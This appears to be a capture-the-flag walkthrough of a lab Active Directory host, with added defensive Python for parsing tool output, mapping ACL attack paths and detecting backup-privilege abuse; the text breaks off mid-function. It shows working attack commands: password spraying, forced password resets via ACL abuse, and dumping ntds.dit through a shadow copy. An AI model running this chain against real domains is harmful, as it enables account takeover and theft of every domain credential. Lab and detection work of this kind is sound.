babyAD
1. User
1.1. Port scanning
┌──(root㉿kali)-[~/Desktop/machines/babyAD]
└─# nmap 192.168.1.5 --min-rate 10000
Starting Nmap 7.95 ( https://nmap.org ) at 2026-01-03 06:22 EST
Nmap scan report for 192.168.1.5
Host is up (0.00037s latency).
Not shown: 988 filtered tcp ports (no-response)
PORT STATE SERVICE
53/tcp open domain
88/tcp open kerberos-sec
135/tcp open msrpc
139/tcp open netbios-ssn
389/tcp open ldap
445/tcp open microsoft-ds
464/tcp open kpasswd5
593/tcp open http-rpc-epmap
636/tcp open ldapssl
3268/tcp open globalcatLDAP
3269/tcp open globalcatLDAPssl
5985/tcp open wsman
MAC Address: 00:0C:29:AC:31:59 (VMware)
Nmap done: 1 IP address (1 host up) scanned in 5.55 seconds
┌──(root㉿kali)-[~/Desktop/machines/babyAD]
└─# nmap 192.168.1.5 -p 53,88,135,139,389,445,464,593,636,3268,3269,5985 -sCV -O
Starting Nmap 7.95 ( https://nmap.org ) at 2026-01-03 06:24 EST
Nmap scan report for 192.168.1.5
Host is up (0.00051s latency).
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2026-01-03 11:24:28Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: babyAD.com0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: babyAD.com0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
MAC Address: 00:0C:29:AC:31:59 (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running (JUST GUESSING): Microsoft Windows 2022|11|2016 (97%)
OS CPE: cpe:/o:microsoft:windows_server_2022 cpe:/o:microsoft:windows_11 cpe:/o:microsoft:windows_server_2016
Aggressive OS guesses: Microsoft Windows Server 2022 (97%), Microsoft Windows 11 21H2 (91%), Microsoft Windows Server 2016 (91%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 1 hop
Service Info: Host: BABYAD; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
|_nbstat: NetBIOS name: BABYAD, NetBIOS user: <unknown>, NetBIOS MAC: 00:0c:29:ac:31:59 (VMware)
| smb2-time:
| date: 2026-01-03T11:24:33
|_ start_date: N/A
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 50.76 seconds
1.2. SMB
┌──(root㉿kali)-[~/Desktop/machines/babyAD]
└─# nxc smb 192.168.1.5 -u 'guest' -p '' --shares
SMB 192.168.1.5 445 BABYAD [*] Windows Server 2022 Build 20348 x64 (name:BABYAD) (domain:babyAD.com) (signing:True) (SMBv1:None) (Null Auth:True)
SMB 192.168.1.5 445 BABYAD [+] babyAD.com\guest:
SMB 192.168.1.5 445 BABYAD [*] Enumerated shares
SMB 192.168.1.5 445 BABYAD Share Permissions Remark
SMB 192.168.1.5 445 BABYAD ----- ----------- ------
SMB 192.168.1.5 445 BABYAD ADMIN$ 远程管理
SMB 192.168.1.5 445 BABYAD C$ 默认共享
SMB 192.168.1.5 445 BABYAD IPC$ READ 远程 IPC
SMB 192.168.1.5 445 BABYAD NETLOGON Logon server share
SMB 192.168.1.5 445 BABYAD SYSVOL Logon server share
SMB 192.168.1.5 445 BABYAD Technical Security Notice READ
┌──(root㉿kali)-[~/Desktop/machines/babyAD]
└─# nxc smb 192.168.1.5 -u '' -p '' --generate-hosts-file hosts
SMB 192.168.1.5 445 BABYAD [*] Windows Server 2022 Build 20348 x64 (name:BABYAD) (domain:babyAD.com) (signing:True) (SMBv1:None) (Null Auth:True)
SMB 192.168.1.5 445 BABYAD [+] babyAD.com\:
┌──(root㉿kali)-[~/Desktop/machines/babyAD]
└─# nxc smb 192.168.1.5 -u '' -p '' --generate-krb5-file /etc/krb5.conf
SMB 192.168.1.5 445 BABYAD [*] Windows Server 2022 Build 20348 x64 (name:BABYAD) (domain:babyAD.com) (signing:True) (SMBv1:None) (Null Auth:True)
SMB 192.168.1.5 445 BABYAD [+] krb5 conf saved to: /etc/krb5.conf
SMB 192.168.1.5 445 BABYAD [+] Run the following command to use the conf file: export KRB5_CONFIG=/etc/krb5.conf
SMB 192.168.1.5 445 BABYAD [+] babyAD.com\:
┌──(root㉿kali)-[~/Desktop/machines/babyAD]
└─# cat hosts
192.168.1.5 BABYAD.babyAD.com babyAD.com BABYAD
┌──(root㉿kali)-[~/Desktop/machines/babyAD]
└─# cat hosts >> /etc/hosts
┌──(root㉿kali)-[~/Desktop/machines/babyAD]
└─# impacket-smbclient 'guest:@192.168.1.5'
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
Password:
Type help for list of commands
# shares
ADMIN$
C$
IPC$
NETLOGON
SYSVOL
Technical Security Notice
# use 'Technical Security Notice'
# use Technical Security Notice
# ls
drw-rw-rw- 0 Fri Dec 26 23:10:12 2025 .
drw-rw-rw- 0 Fri Dec 26 23:27:54 2025 ..
-rw-rw-rw- 5045 Fri Dec 26 23:10:12 2025 技术安全通告.pdf
# get 技术安全通告.pdf
# exit
1.3. RID_Cycling
┌──(root㉿kali)-[~/Desktop/machines/babyAD]
└─# nxc smb 192.168.1.5 -u 'guest' -p '' --rid-brute
SMB 192.168.1.5 445 BABYAD [*] Windows Server 2022 Build 20348 x64 (name:BABYAD) (domain:babyAD.com) (signing:True) (SMBv1:None) (Null Auth:True)
SMB 192.168.1.5 445 BABYAD [+] babyAD.com\guest:
SMB 192.168.1.5 445 BABYAD 498: BABYAD0\Enterprise Read-only Domain Controllers (SidTypeGroup)
SMB 192.168.1.5 445 BABYAD 500: BABYAD0\Administrator (SidTypeUser)
SMB 192.168.1.5 445 BABYAD 501: BABYAD0\Guest (SidTypeUser)
SMB 192.168.1.5 445 BABYAD 502: BABYAD0\krbtgt (SidTypeUser)
SMB 192.168.1.5 445 BABYAD 512: BABYAD0\Domain Admins (SidTypeGroup)
SMB 192.168.1.5 445 BABYAD 513: BABYAD0\Domain Users (SidTypeGroup)
SMB 192.168.1.5 445 BABYAD 514: BABYAD0\Domain Guests (SidTypeGroup)
SMB 192.168.1.5 445 BABYAD 515: BABYAD0\Domain Computers (SidTypeGroup)
SMB 192.168.1.5 445 BABYAD 516: BABYAD0\Domain Controllers (SidTypeGroup)
SMB 192.168.1.5 445 BABYAD 517: BABYAD0\Cert Publishers (SidTypeAlias)
SMB 192.168.1.5 445 BABYAD 518: BABYAD0\Schema Admins (SidTypeGroup)
SMB 192.168.1.5 445 BABYAD 519: BABYAD0\Enterprise Admins (SidTypeGroup)
SMB 192.168.1.5 445 BABYAD 520: BABYAD0\Group Policy Creator Owners (SidTypeGroup)
SMB 192.168.1.5 445 BABYAD 521: BABYAD0\Read-only Domain Controllers (SidTypeGroup)
SMB 192.168.1.5 445 BABYAD 522: BABYAD0\Cloneable Domain Controllers (SidTypeGroup)
SMB 192.168.1.5 445 BABYAD 525: BABYAD0\Protected Users (SidTypeGroup)
SMB 192.168.1.5 445 BABYAD 526: BABYAD0\Key Admins (SidTypeGroup)
SMB 192.168.1.5 445 BABYAD 527: BABYAD0\Enterprise Key Admins (SidTypeGroup)
SMB 192.168.1.5 445 BABYAD 553: BABYAD0\RAS and IAS Servers (SidTypeAlias)
SMB 192.168.1.5 445 BABYAD 571: BABYAD0\Allowed RODC Password Replication Group (SidTypeAlias)
SMB 192.168.1.5 445 BABYAD 572: BABYAD0\Denied RODC Password Replication Group (SidTypeAlias)
SMB 192.168.1.5 445 BABYAD 1000: BABYAD0\BABYAD$ (SidTypeUser)
SMB 192.168.1.5 445 BABYAD 1101: BABYAD0\DnsAdmins (SidTypeAlias)
SMB 192.168.1.5 445 BABYAD 1102: BABYAD0\DnsUpdateProxy (SidTypeGroup)
SMB 192.168.1.5 445 BABYAD 1103: BABYAD0\acc_admins (SidTypeGroup)
SMB 192.168.1.5 445 BABYAD 1104: BABYAD0\wackymaker (SidTypeUser)
SMB 192.168.1.5 445 BABYAD 1105: BABYAD0\babyad-admin (SidTypeUser)
SMB 192.168.1.5 445 BABYAD 1106: BABYAD0\backup-opt (SidTypeUser)
SMB 192.168.1.5 445 BABYAD 1107: BABYAD0\server-opt (SidTypeUser)
SMB 192.168.1.5 445 BABYAD 1108: BABYAD0\accn-opt (SidTypeUser)
┌──(root㉿kali)-[~/Desktop/machines/babyAD]
└─# nxc smb 192.168.1.5 -u valid_user.txt -p valid_user.txt --no-bruteforce
SMB 192.168.1.5 445 BABYAD [*] Windows Server 2022 Build 20348 x64 (name:BABYAD) (domain:babyAD.com) (signing:True) (SMBv1:None) (Null Auth:True)
SMB 192.168.1.5 445 BABYAD [-] babyAD.com\Administrator:Administrator STATUS_LOGON_FAILURE
SMB 192.168.1.5 445 BABYAD [-] babyAD.com\Guest:Guest STATUS_LOGON_FAILURE
SMB 192.168.1.5 445 BABYAD [-] babyAD.com\krbtgt:krbtgt STATUS_LOGON_FAILURE
SMB 192.168.1.5 445 BABYAD [-] babyAD.com\BABYAD$:BABYAD$ STATUS_LOGON_FAILURE
SMB 192.168.1.5 445 BABYAD [-] babyAD.com\wackymaker:wackymaker STATUS_PASSWORD_MUST_CHANGE
SMB 192.168.1.5 445 BABYAD [-] babyAD.com\babyad-admin:babyad-admin STATUS_LOGON_FAILURE
SMB 192.168.1.5 445 BABYAD [-] babyAD.com\backup-opt:backup-opt STATUS_LOGON_FAILURE
SMB 192.168.1.5 445 BABYAD [-] babyAD.com\server-opt:server-opt STATUS_LOGON_FAILURE
SMB 192.168.1.5 445 BABYAD [-] babyAD.com\accn-opt:accn-opt STATUS_LOGON_FAILURE
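The RID-cycling output above is where the account names in valid_user.txt come from, and the username-as-password check that follows returns a different NT status per account. As an added example (not part of the original write-up, and not NetExec's own code), the following Python parses both kinds of nxc smb lines: it pulls the SidTypeUser entries out of --rid-brute output and maps each account in the check to the status the DC returned. The sample lines, host and account names are constructed; the line format follows the output shown above. From a defender's view the interesting bucket is STATUS_PASSWORD_MUST_CHANGE: the credential was accepted, so an initial password that was never rotated is as good as a valid one.

```python
import re
from collections import defaultdict

# Constructed sample of `nxc smb <host> -u guest -p '' --rid-brute` output.
RID_BRUTE_SAMPLE = """\
SMB 192.0.2.10 445 DC01 [*] Windows Server 2022 Build 20348 x64 (name:DC01) (domain:example.test) (signing:True) (SMBv1:None) (Null Auth:True)
SMB 192.0.2.10 445 DC01 [+] example.test\\guest:
SMB 192.0.2.10 445 DC01 500: EXAMPLE\\Administrator (SidTypeUser)
SMB 192.0.2.10 445 DC01 512: EXAMPLE\\Domain Admins (SidTypeGroup)
SMB 192.0.2.10 445 DC01 1000: EXAMPLE\\DC01$ (SidTypeUser)
SMB 192.0.2.10 445 DC01 1104: EXAMPLE\\alice (SidTypeUser)
SMB 192.0.2.10 445 DC01 1105: EXAMPLE\\bob (SidTypeUser)
"""

# Constructed sample of `nxc smb <host> -u users.txt -p users.txt --no-bruteforce` output.
AUTH_SAMPLE = """\
SMB 192.0.2.10 445 DC01 [-] example.test\\Administrator:Administrator STATUS_LOGON_FAILURE
SMB 192.0.2.10 445 DC01 [-] example.test\\alice:alice STATUS_PASSWORD_MUST_CHANGE
SMB 192.0.2.10 445 DC01 [-] example.test\\bob:bob STATUS_ACCOUNT_LOCKED_OUT
SMB 192.0.2.10 445 DC01 [+] example.test\\carol:carol
"""

# "SMB <ip> <port> <host> <rid>: <DOMAIN>\<name> (<SidType>)"
RID_RE = re.compile(r"^SMB\s+\S+\s+\d+\s+\S+\s+(\d+):\s+[^\\]+\\(.+?)\s+\((SidType\w+)\)\s*$")
# "SMB <ip> <port> <host> [+|-] <domain>\<user>:<password> [STATUS_...]"
AUTH_RE = re.compile(r"^SMB\s+\S+\s+\d+\s+\S+\s+\[([-+])\]\s+[^\\]+\\([^:]+):(\S*)(?:\s+(STATUS_\w+))?\s*$")


def parse_rid_brute(text):
    """Return {rid: (name, sid_type)} for every RID the DC resolved."""
    out = {}
    for line in text.splitlines():
        m = RID_RE.match(line)
        if m:
            out[int(m.group(1))] = (m.group(2), m.group(3))
    return out


def user_accounts(rid_map):
    """Names of SidTypeUser entries, excluding machine accounts (trailing '$')."""
    return sorted(n for n, t in rid_map.values() if t == "SidTypeUser" and not n.endswith("$"))


def parse_auth_results(text):
    """Return {username: status}; a '[+]' line means the logon succeeded."""
    out = {}
    for line in text.splitlines():
        m = AUTH_RE.match(line)
        if not m:
            continue
        ok, user, _password, status = m.groups()
        out[user] = "STATUS_SUCCESS" if ok == "+" else (status or "STATUS_UNKNOWN")
    return out


def findings(auth):
    """Group accounts by the hygiene problem each status reveals (username was used as password)."""
    groups = defaultdict(list)
    for user, status in auth.items():
        if status == "STATUS_SUCCESS":
            groups["password_equals_username"].append(user)
        elif status == "STATUS_PASSWORD_MUST_CHANGE":
            # Credential accepted, DC only demands a change: whoever knows the
            # initial password gets to choose the new one.
            groups["initial_password_not_rotated"].append(user)
        elif status == "STATUS_ACCOUNT_LOCKED_OUT":
            groups["locked_out"].append(user)
    return dict(groups)


if __name__ == "__main__":
    print(user_accounts(parse_rid_brute(RID_BRUTE_SAMPLE)))
    print(findings(parse_auth_results(AUTH_SAMPLE)))
```

Two things worth noting when using this on real output: the RID list is what an anonymous or guest session can enumerate, so the account names themselves are exposed to anyone on the network, and the "must change" bucket should be treated as a finding with the same urgency as a successful logon.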
Change the password.
┌──(root㉿kali)-[~/Desktop/machines/babyAD]
└─# nxc smb 192.168.1.5 -u wackymaker -p wackymaker -M change-password -o NEWPASS=Admin123
SMB 192.168.1.5 445 BABYAD [*] Windows Server 2022 Build 20348 x64 (name:BABYAD) (domain:babyAD.com) (signing:True) (SMBv1:None) (Null Auth:True)
SMB 192.168.1.5 445 BABYAD [-] babyAD.com\wackymaker:wackymaker STATUS_PASSWORD_MUST_CHANGE
CHANGE-P... 192.168.1.5 445 BABYAD [+] Successfully changed password for wackymaker
┌──(root㉿kali)-[~/Desktop/machines/babyAD]
└─# nxc smb 192.168.1.5 -u wackymaker -p Admin123
SMB 192.168.1.5 445 BABYAD [*] Windows Server 2022 Build 20348 x64 (name:BABYAD) (domain:babyAD.com) (signing:True) (SMBv1:None) (Null Auth:True)
SMB 192.168.1.5 445 BABYAD [+] babyAD.com\wackymaker:Admin123
┌──(root㉿kali)-[~/Desktop/machines/babyAD]
└─# nxc winrm 192.168.1.5 -u wackymaker -p Admin123
WINRM 192.168.1.5 5985 BABYAD [*] Windows Server 2022 Build 20348 (name:BABYAD) (domain:babyAD.com)
WINRM 192.168.1.5 5985 BABYAD [+] babyAD.com\wackymaker:Admin123 (Pwn3d!)
1.4. winrm
┌──(root㉿kali)-[~/Desktop/machines/babyAD]
└─# evil-winrm -i 192.168.1.5 -u wackymaker -p Admin123
Evil-WinRM shell v3.9
Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\wackymaker\Documents> whoami;hostname
babyad0\wackymaker
babyAD
*Evil-WinRM* PS C:\Users\wackymaker\Documents>
*Evil-WinRM* PS C:\Users\wackymaker\desktop> dir
*Evil-WinRM* PS C:\Users\wackymaker\desktop> gci -path c:\users user.txt
目录: C:\users
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 12/27/2025 11:55 AM 18 user.txt
*Evil-WinRM* PS C:\Users\wackymaker\desktop> gc c:\users\user.txt
a3f5c9e47d2b1a8f
2. System
2.1. bloodhound
*Evil-WinRM* PS C:\Users\wackymaker\desktop> upload SharpHound.exe
Info: Uploading /root/Desktop/machines/babyAD/SharpHound.exe to C:\Users\wackymaker\desktop\SharpHound.exe
Data: 1748308 bytes of 1748308 bytes copied
Info: Upload successful!
*Evil-WinRM* PS C:\Users\wackymaker\desktop> .\SharpHound.exe -c ALL
2026-01-03T20:09:25.0406600+08:00|INFORMATION|This version of SharpHound is compatible with the 5.0.0 Release of BloodHound
2026-01-03T20:09:25.1812350+08:00|INFORMATION|Resolved Collection Methods: Group, LocalAdmin, GPOLocalGroup, Session, LoggedOn, Trusts, ACL,
Container, RDP, ObjectProps, DCOM, SPNTargets, PSRemote, UserRights, CARegistry, DCRegistry, CertServices, LdapServices, WebClientService,
SmbInfo, NTLMRegistry
2026-01-03T20:09:25.2125237+08:00|INFORMATION|Initializing SharpHound at 20:09 on 2026/1/3
2026-01-03T20:09:25.2437172+08:00|INFORMATION|Resolved current domain to babyAD.com
2026-01-03T20:09:25.3542563+08:00|INFORMATION|Flags: Group, LocalAdmin, GPOLocalGroup, Session, LoggedOn, Trusts, ACL, Container, RDP, ObjectProps, DCOM, SPNTargets, PSRemote, UserRights, CARegistry, DCRegistry, CertServices, LdapServices, WebClientService, SmbInfo, NTLMRegistry
2026-01-03T20:09:25.4166617+08:00|INFORMATION|Beginning LDAP search for babyAD.com
...
2026-01-03T20:09:31.8660681+08:00|INFORMATION|Output channel closed, waiting for output task to complete
Closing writers
2026-01-03T20:09:31.9288670+08:00|INFORMATION|Status: 299 objects finished (+299 49.83333)/s -- Using 72 MB RAM
2026-01-03T20:09:31.9288670+08:00|INFORMATION|Enumeration finished in 00:00:06.5298466
2026-01-03T20:09:32.0071000+08:00|INFORMATION|Saving cache with stats: 20 ID to type mappings.
0 name to SID mappings.
1 machine sid mappings.
3 sid to domain mappings.
0 global catalog mappings.
2026-01-03T20:09:32.0227859+08:00|INFORMATION|SharpHound Enumeration Completed at 20:09 on 2026/1/3! Happy Graphing!
*Evil-WinRM* PS C:\Users\wackymaker\desktop> dir
目录: C:\Users\wackymaker\desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 1/3/2026 8:09 PM 28121 20260103200926_BloodHound.zip
-a---- 1/3/2026 8:09 PM 1566 N2Q4YzlmOWUtOGQxOC00ZmNiLTkzZjktNmJkOGZlYmQ5MzM4.bin
-a---- 1/3/2026 8:09 PM 1311232 SharpHound.exe
*Evil-WinRM* PS C:\Users\wackymaker\desktop> download 20260103200926_BloodHound.zip
Info: Downloading C:\Users\wackymaker\desktop\20260103200926_BloodHound.zip to 20260103200926_BloodHound.zip
Info: Download successful!
First, add ourselves to the ACC_ADMINS group.
┌──(root㉿kali)-[~/Desktop/BloodHound]
└─# bloodyAD --host BABYAD.babyAD.com -d babyAD.com -u 'wackymaker' -p 'Admin123' -k --dc-ip 192.168.1.5 set owner 'ACC_ADMINS' 'wackymaker'
[+] Old owner S-1-5-21-3649830887-1815587496-1699028491-512 is now replaced by wackymaker on ACC_ADMINS
┌──(root㉿kali)-[~/Desktop/BloodHound]
└─# bloodyAD --host BABYAD.babyAD.com -d babyAD.com -u 'wackymaker' -p 'Admin123' -k --dc-ip 192.168.1.5 add genericAll 'ACC_ADMINS' 'wackymaker'
[+] wackymaker has now GenericAll on ACC_ADMINS
┌──(root㉿kali)-[~/Desktop/BloodHound]
└─# bloodyAD --host BABYAD.babyAD.com -d babyAD.com -u 'wackymaker' -p 'Admin123' -k --dc-ip 192.168.1.5 add groupMember 'ACC_ADMINS' 'wackymaker'
[+] wackymaker added to ACC_ADMINS
Then change BABYAD-ADMIN's password.
┌──(root㉿kali)-[~/Desktop/machines/babyAD/ansi-colors]
└─# bloodyAD --host BABYAD.babyAD.com -k --dc-ip 192.168.1.5 -d babyAD.com -u 'wackymaker' -p 'Admin123' set password BABYAD-ADMIN Admin123
[+] Password changed successfully!
┌──(root㉿kali)-[~/Desktop/machines/babyAD/ansi-colors]
└─# nxc smb 192.168.1.5 -u BABYAD-ADMIN -p Admin123
SMB 192.168.1.5 445 BABYAD [*] Windows Server 2022 Build 20348 x64 (name:BABYAD) (domain:babyAD.com) (signing:True) (SMBv1:None) (Null Auth:True)
SMB 192.168.1.5 445 BABYAD [+] babyAD.com\BABYAD-ADMIN:Admin123
┌──(root㉿kali)-[~/Desktop/machines/babyAD/ansi-colors]
└─# nxc winrm 192.168.1.5 -u BABYAD-ADMIN -p Admin123
WINRM 192.168.1.5 5985 BABYAD [*] Windows Server 2022 Build 20348 (name:BABYAD) (domain:babyAD.com)
WINRM 192.168.1.5 5985 BABYAD [+] babyAD.com\BABYAD-ADMIN:Admin123 (Pwn3d!)
┌──(root㉿kali)-[~/Desktop/machines/babyAD]
└─# bloodyAD --host BABYAD.babyAD.com -k --dc-ip 192.168.1.5 -d babyAD.com -u 'BABYAD-ADMIN' -p 'Admin123' set password BACKUP-OPT Admin123
[+] Password changed successfully!
┌──(root㉿kali)-[~/Desktop/machines/babyAD]
└─# nxc smb 192.168.1.5 -u BACKUP-OPT -p Admin123
SMB 192.168.1.5 445 BABYAD [*] Windows Server 2022 Build 20348 x64 (name:BABYAD) (domain:babyAD.com) (signing:True) (SMBv1:None) (Null Auth:True)
SMB 192.168.1.5 445 BABYAD [+] babyAD.com\BACKUP-OPT:Admin123
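The chain just walked, from WriteOwner on ACC_ADMINS to a password reset of BACKUP-OPT, is the kind of edge sequence BloodHound draws from the SharpHound collection above. As an added example (not code from the write-up, from BloodHound or from bloodyAD), this Python models object rights as a small graph and answers the two questions an AD audit asks: which ACEs give a non-privileged principal an actionable right over a privileged object, and whether any path exists from a given user to a given target. The write-up only shows that wackymaker could take ownership of ACC_ADMINS (the previous owner was the Domain Admins SID) and that the group's membership was enough to reset BABYAD-ADMIN, which in turn could reset BACKUP-OPT; the ACE list below is a constructed model consistent with that, and the specific rights on the -opt accounts, the helpdesk entry and the memberships are assumptions.

```python
from collections import defaultdict, deque

# Rights that let the holder take full control of the target. WriteOwner alone is
# enough: become owner, rewrite the DACL, grant yourself GenericAll (as shown above).
CONTROL_RIGHTS = {"Owns", "WriteOwner", "WriteDacl", "GenericAll"}
# Rights that let the holder add members to a group.
ADD_MEMBER_RIGHTS = {"GenericWrite", "AddMember", "WriteProperty"}
# Rights that let the holder set a user's password without knowing the old one.
RESET_RIGHTS = {"ForceChangePassword", "AllExtendedRights"}
ACTIONABLE = CONTROL_RIGHTS | ADD_MEMBER_RIGHTS | RESET_RIGHTS

# Constructed ACEs as (principal, right, target).
ACES = [
    ("wackymaker", "WriteOwner", "ACC_ADMINS"),             # consistent with `set owner` succeeding
    ("ACC_ADMINS", "ForceChangePassword", "babyad-admin"),  # assumed
    ("babyad-admin", "ForceChangePassword", "backup-opt"),  # assumed
    ("Domain Admins", "GenericAll", "ACC_ADMINS"),          # expected: admins control everything
    ("helpdesk", "ForceChangePassword", "alice"),           # assumed, benign
]
# Constructed group memberships: group -> members.
MEMBERSHIPS = {"ACC_ADMINS": {"accn-opt"}, "Domain Admins": {"Administrator"}}
# Objects whose control is domain compromise or leads there (constructed tier list).
PRIVILEGED = {"Domain Admins", "Enterprise Admins", "Administrator",
              "ACC_ADMINS", "babyad-admin", "backup-opt"}


def build_graph(aces, memberships):
    """Directed graph: principal -> [(target, right)] for actionable ACEs, plus MemberOf edges."""
    graph = defaultdict(list)
    for principal, right, target in aces:
        if right in ACTIONABLE:
            graph[principal].append((target, right))
    for group, members in memberships.items():
        for member in members:
            graph[member].append((group, "MemberOf"))
    return graph


def find_path(graph, start, goal):
    """Shortest hop sequence from start to goal as [node, '--right-->', node, ...], or None."""
    queue = deque([(start, [start])])
    seen = {start}
    while queue:
        node, path = queue.popleft()
        if node == goal:
            return path
        for nxt, right in graph.get(node, ()):
            if nxt not in seen:
                seen.add(nxt)
                queue.append((nxt, path + [f"--{right}-->", nxt]))
    return None


def dangerous_aces(aces, privileged=PRIVILEGED):
    """ACEs granting a non-privileged principal an actionable right over a privileged object."""
    return [(p, r, t) for p, r, t in aces
            if t in privileged and p not in privileged and r in ACTIONABLE]


if __name__ == "__main__":
    g = build_graph(ACES, MEMBERSHIPS)
    print(" ".join(find_path(g, "wackymaker", "backup-opt")))
    print(dangerous_aces(ACES))
```

The remediation this points at is the first edge, not the last: once the stray WriteOwner on ACC_ADMINS is removed (and the owner set back to Domain Admins), every path from wackymaker disappears, whereas resetting the -opt passwords alone changes nothing about who can reach them.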
*Evil-WinRM* PS C:\Users\backup-opt\Documents> whoami /priv
特权信息
----------------------
特权名 描述 状态
============================= ================ ======
SeMachineAccountPrivilege 将工作站添加到域 已启用
SeBackupPrivilege 备份文件和目录 已启用
SeRestorePrivilege 还原文件和目录 已启用
SeShutdownPrivilege 关闭系统 已启用
SeChangeNotifyPrivilege 绕过遍历检查 已启用
SeIncreaseWorkingSetPrivilege 增加进程工作集 已启用
*Evil-WinRM* PS C:\Users\backup-opt\Documents>
2.2. Volume shadow copy
*Evil-WinRM* PS C:\temp> diskshadow /s raj.dsh
Microsoft DiskShadow 版本 1.0
版权所有 (C) 2013 Microsoft Corporation
在计算机上: BABYAD,2026/1/3 23:26:01
-> set context persistent nowriters
-> add volume c: alias raj
-> create
已将卷影 ID {c517776e-4909-438e-939e-9075f39a773a} 的别名 raj 设置为环境变量。
已将卷影集 ID {eeb0e07c-db9d-4383-8ea8-e717ceec7542} 的别名 VSS_SHADOW_SET 设置为环境变量。
正在查询卷影副本集 ID 为 {eeb0e07c-db9d-4383-8ea8-e717ceec7542} 的所有卷影副本
* 卷影副本 ID = {c517776e-4909-438e-939e-9075f39a773a} %raj%
- 卷影副本集: {eeb0e07c-db9d-4383-8ea8-e717ceec7542} %VSS_SHADOW_SET%
- 卷影副本原始数 = 1
- 原始卷名称: \\?\Volume{ed91bad1-0000-0000-0000-500600000000}\ [C:\]
- 创建时间: 2026/1/3 23:26:01
- 卷影副本设备名称: \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1
- 原始计算机: babyAD.babyAD.com
- 服务计算机: babyAD.babyAD.com
- 未暴露
- 提供程序 ID: {b5946137-7b9f-4925-af80-51abd60b20d5}
- 属性: No_Auto_Release Persistent No_Writers Differential
已列出的卷影副本数: 1
-> expose %raj% z:
-> %raj% = {c517776e-4909-438e-939e-9075f39a773a}
已成功将卷影副本暴露为 z:\。
->
*Evil-WinRM* PS C:\temp> robocopy /b z:\windows\ntds . ntds.dit
-------------------------------------------------------------------------------
ROBOCOPY :: Windows 的可靠文件复制
-------------------------------------------------------------------------------
开始时间: 2026年1月3日 23:26:10
源: z:\windows\ntds\
目标: C:\temp\
文件: ntds.dit
选项: /DCOPY:DA /COPY:DAT /B /R:1000000 /W:30
------------------------------------------------------------------------------
1 z:\windows\ntds\
新文件 16.0 m ntds.dit
0.0%
0.3%
0.7%
1.1%
1.5%
1.9%
2.3%
2.7%
...
------------------------------------------------------------------------------
总数 复制 跳过 不匹配 失败 其他
目录: 1 0 1 0 0 0
文件: 1 1 0 0 0 0
字节: 16.00 m 16.00 m 0 0 0 0
时间: 0:00:00 0:00:00 0:00:00 0:00:00
速度: 270,600,258 字节/秒。
速度: 15,483.871 MB/分钟。
已结束: 2026年1月3日 23:26:10
*Evil-WinRM* PS C:\temp> reg save hklm\system c:\Temp\system
操作成功完成。
*Evil-WinRM* PS C:\temp> cd C:\Temp
*Evil-WinRM* PS C:\Temp> download ntds.dit
Info: Downloading C:\Temp\ntds.dit to ntds.dit
Info: Download successful!
*Evil-WinRM* PS C:\Temp> download system
Info: Downloading C:\Temp\system to system
Info: Download successful!
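Every step of the extraction above leaves a Security-log trace: a 4672 event listing SeBackupPrivilege for the backup-opt logon, and 4688 process-creation events for diskshadow, robocopy /b and reg save (the command line is only recorded when "Include command line in process creation events" is enabled). As an added example (not from the write-up), this Python runs four rules over a constructed list of already-parsed events and correlates hits per user, so that the whole chain fires rather than any single noisy event. The allowlist of accounts expected to hold SeBackupPrivilege, the field values and the svc-backup account are made up for illustration; the field names follow the Windows event schema.

```python
import re
from collections import defaultdict

# Constructed, already-parsed Security-log events mirroring the session above.
SAMPLE_EVENTS = [
    {"EventID": 4672, "SubjectUserName": "Administrator",
     "PrivilegeList": "SeBackupPrivilege SeRestorePrivilege SeDebugPrivilege"},
    {"EventID": 4672, "SubjectUserName": "backup-opt",
     "PrivilegeList": "SeMachineAccountPrivilege SeBackupPrivilege SeRestorePrivilege"},
    {"EventID": 4688, "SubjectUserName": "backup-opt",
     "NewProcessName": "C:\\Windows\\System32\\diskshadow.exe",
     "CommandLine": "diskshadow /s raj.dsh"},
    {"EventID": 4688, "SubjectUserName": "backup-opt",
     "NewProcessName": "C:\\Windows\\System32\\Robocopy.exe",
     "CommandLine": "robocopy /b z:\\windows\\ntds . ntds.dit"},
    {"EventID": 4688, "SubjectUserName": "backup-opt",
     "NewProcessName": "C:\\Windows\\System32\\reg.exe",
     "CommandLine": "reg save hklm\\system c:\\Temp\\system"},
    {"EventID": 4688, "SubjectUserName": "svc-backup",        # legitimate backup job
     "NewProcessName": "C:\\Windows\\System32\\Robocopy.exe",
     "CommandLine": "robocopy /b D:\\data E:\\backup /mir"},
]

# Constructed allowlist: accounts that legitimately log on with SeBackupPrivilege.
EXPECTED_BACKUP_HOLDERS = {"Administrator", "svc-backup"}


def _image(ev):
    """Lower-cased executable name from a Windows path (string split, so it works on any OS)."""
    return ev.get("NewProcessName", "").rsplit("\\", 1)[-1].lower()


def _cmdline(ev):
    return ev.get("CommandLine", "").lower()


def rule_unexpected_backup_privilege(ev):
    """4672: SeBackupPrivilege assigned to a logon that is not on the allowlist."""
    return (ev["EventID"] == 4672
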